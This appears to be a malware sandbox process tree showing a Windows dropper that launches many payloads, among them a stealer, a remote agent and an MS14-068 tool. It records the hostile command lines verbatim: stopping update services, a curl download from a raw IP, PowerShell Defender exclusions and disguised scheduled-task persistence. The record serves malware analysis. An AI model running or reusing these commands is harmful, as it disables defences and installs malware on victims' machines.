C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:40712
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:40700
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:39036
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:17536
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:40808
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:40824
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:2916
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:40464
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:2516
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe"C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe"3⤵PID:43440
-
-
C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"3⤵PID:18312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18312 -s 4364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:18072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18312 -s 4444⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:12728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"3⤵PID:14372
-
C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe"C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall4⤵
- Sets service image path in registry
PID:14524 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:14748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\up.exe"C:\Users\Admin\AppData\Local\Temp\Files\up.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:12032
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Team.exe"C:\Users\Admin\AppData\Local\Temp\Files\Team.exe"3⤵PID:1540
-
-
C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"3⤵PID:21132
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SetWindowsHookEx
PID:5680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pHash.bat4⤵PID:7792
-
C:\Windows\system32\curl.execurl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"5⤵PID:6816
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"3⤵PID:6276
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svhostc.exe"C:\Users\Admin\AppData\Local\Temp\Files\svhostc.exe"3⤵
- Suspicious use of SetThreadContext
PID:6424 -
C:\Users\Admin\AppData\Local\Temp\Files\svhostc.exe"C:\Users\Admin\AppData\Local\Temp\Files\svhostc.exe"4⤵
- Checks computer location settings
PID:22900
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hbfgjhhesfd.exe"C:\Users\Admin\AppData\Local\Temp\Files\hbfgjhhesfd.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6872 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\hbfgjhhesfd.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:22388 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:22412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵PID:19544
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Token%20Gen.exe"C:\Users\Admin\AppData\Local\Temp\Files\Token%20Gen.exe"3⤵PID:24804
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:27732 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:28376 -
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"5⤵
- Checks processor information in registry
PID:29288
-
-
C:\Users\Admin\AppData\Local\Temp\1001527001\5hvzv2sl.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\5hvzv2sl.exe"5⤵
- Suspicious use of SetThreadContext
PID:29388 -
C:\Users\Admin\AppData\Local\Temp\1001527001\5hvzv2sl.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\5hvzv2sl.exe"6⤵PID:30508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 29388 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:30076
-
-
-
C:\Users\Admin\AppData\Local\Temp\1002552001\ha7dur10.exe"C:\Users\Admin\AppData\Local\Temp\1002552001\ha7dur10.exe"5⤵
- System Location Discovery: System Language Discovery
PID:33776 -
C:\Windows\Temp\{2739D0FB-3482-441F-8609-A15F3EFFFEE7}\.cr\ha7dur10.exe"C:\Windows\Temp\{2739D0FB-3482-441F-8609-A15F3EFFFEE7}\.cr\ha7dur10.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\1002552001\ha7dur10.exe" -burn.filehandle.attached=712 -burn.filehandle.self=5286⤵
- Loads dropped DLL
PID:31276 -
C:\Windows\Temp\{29923C8F-A360-46F0-B6BC-996DB277F207}\.ba\Newfts.exe"C:\Windows\Temp\{29923C8F-A360-46F0-B6BC-996DB277F207}\.ba\Newfts.exe"7⤵
- Loads dropped DLL
PID:3864 -
C:\Users\Admin\AppData\Roaming\Fbhost_alpha\Newfts.exeC:\Users\Admin\AppData\Roaming\Fbhost_alpha\Newfts.exe8⤵PID:10036
-
C:\Users\Admin\AppData\Roaming\Fbhost_alpha\tcpvcon.exe"C:\Users\Admin\AppData\Roaming\Fbhost_alpha\tcpvcon.exe" "C:\Users\Admin\AppData\Roaming\Fbhost_alpha\tcpvcon.exe" /accepteula9⤵PID:15316
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe10⤵PID:23628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 23628 -s 74811⤵
- Program crash
PID:21968
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1002824001\8facf62118.exe"C:\Users\Admin\AppData\Local\Temp\1002824001\8facf62118.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:32288
-
-
C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"5⤵
- Checks computer location settings
- Drops file in Windows directory
PID:5856 -
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"6⤵
- Checks computer location settings
PID:32888 -
C:\Users\Admin\AppData\Local\Temp\10000270101\Javvvum.exe"C:\Users\Admin\AppData\Local\Temp\10000270101\Javvvum.exe"7⤵
- Loads dropped DLL
PID:33500
-
-
C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe"C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe"7⤵PID:34304
-
C:\Users\Admin\AppData\Local\Temp\is-735RV.tmp\stail.tmp"C:\Users\Admin\AppData\Local\Temp\is-735RV.tmp\stail.tmp" /SL5="$90408,4245990,54272,C:\Users\Admin\AppData\Local\Temp\10000281101\stail.exe"8⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:36168 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause view_s_112019⤵PID:36356
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:36364
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause view_s_1120110⤵PID:4388
-
-
-
C:\Users\Admin\AppData\Local\ViewS 22.01.16\views.exe"C:\Users\Admin\AppData\Local\ViewS 22.01.16\views.exe" -i9⤵
- Loads dropped DLL
PID:36380
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe"C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe"5⤵PID:8884
-
-
C:\Users\Admin\AppData\Local\Temp\1003620001\szo0xbx8.exe"C:\Users\Admin\AppData\Local\Temp\1003620001\szo0xbx8.exe"5⤵PID:35808
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\SERVIC~1.EXE"6⤵PID:7984
-
C:\Users\Admin\AppData\Local\Temp\SERVIC~1.EXEC:\Users\Admin\AppData\Local\Temp\SERVIC~1.EXE7⤵PID:23948
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f6⤵PID:21816
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\System32\schtasks.exe /create /tn ServiceData4 /tr C:\Users\Admin\AppData\Local\Temp\/service123.exe /st 00:01 /du 9800:59 /sc once /ri 1 /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:22616
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 35808 -s 11286⤵
- Program crash
PID:11244
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003673001\fd45ee69c3.exe"C:\Users\Admin\AppData\Local\Temp\1003673001\fd45ee69c3.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:37360
-
-
C:\Users\Admin\AppData\Local\Temp\1003674001\1b2e8379f6.exe"C:\Users\Admin\AppData\Local\Temp\1003674001\1b2e8379f6.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:37884
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\DiskUtility.exe"C:\Users\Admin\AppData\Local\Temp\Files\DiskUtility.exe"3⤵PID:34344
-
-
C:\Users\Admin\AppData\Local\Temp\Files\s.exe"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"3⤵PID:34644
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"3⤵PID:40036
-
-
C:\Users\Admin\AppData\Local\Temp\Files\fuag.exe"C:\Users\Admin\AppData\Local\Temp\Files\fuag.exe"3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:35868 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\fuag.exe'4⤵
- Drops file in Windows directory
PID:17212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\fuag.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:3240 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:3472
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fuag.exe'4⤵
- Drops file in Windows directory
PID:1624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fuag.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:13928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:14168
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\WenzCord.exe"C:\Users\Admin\AppData\Local\Temp\Files\WenzCord.exe"3⤵PID:40516
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Update.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\WenzCord.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:41260 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:40948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"3⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:40420 -
C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:40744 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe5⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:40068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"3⤵PID:5148
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\PIMER_~1.EXE"3⤵
- Drops file in Windows directory
PID:41656 -
C:\Users\Admin\AppData\Local\Temp\Files\PIMER_~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\PIMER_~1.EXE4⤵
- Suspicious use of SetThreadContext
PID:41964 -
C:\Users\Admin\AppData\Local\Temp\Files\PIMER_~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\PIMER_~1.EXE"5⤵PID:43612
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"3⤵
- Drops file in Windows directory
PID:23076 -
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exeC:\Users\Admin\AppData\Local\Temp\Files\crypted.exe4⤵
- Suspicious use of SetThreadContext
PID:17976 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:43632
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3yh8gdte.exe"3⤵PID:13356
-
C:\Users\Admin\AppData\Local\Temp\Files\3yh8gdte.exeC:\Users\Admin\AppData\Local\Temp\Files\3yh8gdte.exe4⤵PID:12224
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\dtl.exe"3⤵PID:32680
-
C:\Users\Admin\AppData\Local\Temp\Files\dtl.exeC:\Users\Admin\AppData\Local\Temp\Files\dtl.exe4⤵PID:9412
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\MS14-068.exe"3⤵PID:33080
-
C:\Users\Admin\AppData\Local\Temp\Files\MS14-068.exeC:\Users\Admin\AppData\Local\Temp\Files\MS14-068.exe4⤵PID:33984
-
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:40460
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:40468
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:40476
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:40396
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:40492
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:40628
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:40640
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:40648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:11128
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:9232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:8792
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:19236
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:19164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:17816
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:17376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:17200
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:16768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:16084
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:15608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:14596
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:14884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:12936
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:11968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:11276
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:10980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:2616
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:24384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:9476
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:8768
-
-
